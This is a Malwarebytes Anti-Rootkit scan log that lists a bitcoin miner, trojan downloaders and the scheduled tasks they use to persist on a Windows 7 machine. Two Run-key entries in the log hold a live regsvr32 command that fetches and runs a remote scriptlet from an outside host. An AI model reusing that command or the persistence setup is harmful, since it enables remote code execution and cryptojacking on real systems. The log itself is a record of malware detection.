Malwarebytes Anti-Rootkit BETA 1.10.3.1001 www.malwarebytes.org Database version: main: v2020.04.20.05 rootkit: v2020.04.20.05 Windows 7 Service Pack 1 x64 NTFS Internet Explorer 11.0.9600.19596 Sergio :: ANDROID [administrator] 20/04/2020 15:57:27 mbar-log-2020-04-20 (15-57-27).txt Scan type: Quick scan Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken Scan options disabled: Objects scanned: 231185 Time elapsed: 3 hour(s), 5 minute(s), 16 second(s) Memory Processes Detected: 2 C:\Windows\inf\aspnet\lsma12.exe (RiskWare.BitCoinMiner) -> 1948 -> Delete on reboot. [19fc2c8e01d5b185b6a659b148bbf709] C:\Windows\update.exe (Trojan.Downloader) -> 2532 -> Delete on reboot. [f32201b9c5113afc4b2fdb12738ec33d] Memory Modules Detected: 0 (No malicious items detected) Registry Keys Detected: 8 HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{654B8343-C8FA-46EC-B7E7-C520C4DC2B31} (RiskWare.BitCoinMiner) -> Delete on reboot. [4bcacaf034a26fc783c46361a759b749] HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{703B071F-3CCB-48DE-A1DA-CFD8AD366F34} (Trojan.Agent.WmiBit) -> Delete on reboot. [b75e73474690b97d1cd09a29c937f907] HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa (Trojan.Agent.WmiBit) -> Delete on reboot. [1ef7a41625b1d46251cd9437ea16e020] HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa1 (Trojan.Agent.WmiBit) -> Delete on reboot. [66af8e2ce8ee00363bd1f7d45fa15ea2] HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa2 (Trojan.Agent.WmiBit) -> Delete on reboot. [e62fb802e4f2be78de2e5f6c748cb848] HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa3 (Trojan.Agent.WmiBit) -> Delete on reboot. [4ec7ffbb1eb8b08635d78744679946ba] HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\ok (Trojan.Agent.Generic) -> Delete on reboot. [b4614179e7efef47a4d5f2d936cac838] HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\oka (RiskWare.BitCoinMiner) -> Delete on reboot. [2aeb209a488ee0560e6c9f2c27d99c64] Registry Values Detected: 4 HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{654B8343-C8FA-46EC-B7E7-C520C4DC2B31}|Path (RiskWare.BitCoinMiner) -> Data: \oka -> Delete on reboot. [4bcacaf034a26fc783c46361a759b749] HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{703B071F-3CCB-48DE-A1DA-CFD8AD366F34}|Path (Trojan.Agent.WmiBit) -> Data: \Mysa -> Delete on reboot. [b75e73474690b97d1cd09a29c937f907] HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|start (Trojan.Agent.Generic) -> Data: regsvr32 /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll -> Delete on reboot. [888d2e8c6670d85eca0ead2205fbc33d] HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|start (Trojan.Agent.Generic) -> Data: regsvr32 /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll -> Delete on reboot. [9481ac0e993d211519bfa52a837d06fa] Registry Data Items Detected: 0 (No malicious items detected) Folders Detected: 0 (No malicious items detected) Files Detected: 5 C:\Windows\inf\aspnet\lsma12.exe (RiskWare.BitCoinMiner) -> Delete on reboot. [19fc2c8e01d5b185b6a659b148bbf709] C:\Windows\update.exe (Trojan.Downloader) -> Delete on reboot. [f32201b9c5113afc4b2fdb12738ec33d] C:\Program Files\Common Files\xpdown.dat (Trojan.Agent.E) -> Delete on reboot. [1302a8124393d462cdc167e08779916f] C:\Windows\System32\Tasks\Mysa (Trojan.Agent.WmiBit) -> Delete on reboot. [94814e6c4b8b290d7a67236255ab01ff] C:\Windows\System32\Tasks\oka (RiskWare.BitCoinMiner) -> Delete on reboot. [fe1748728056f0464707eb9bfe0260a0] Physical Sectors Detected: 0 (No malicious items detected) (end)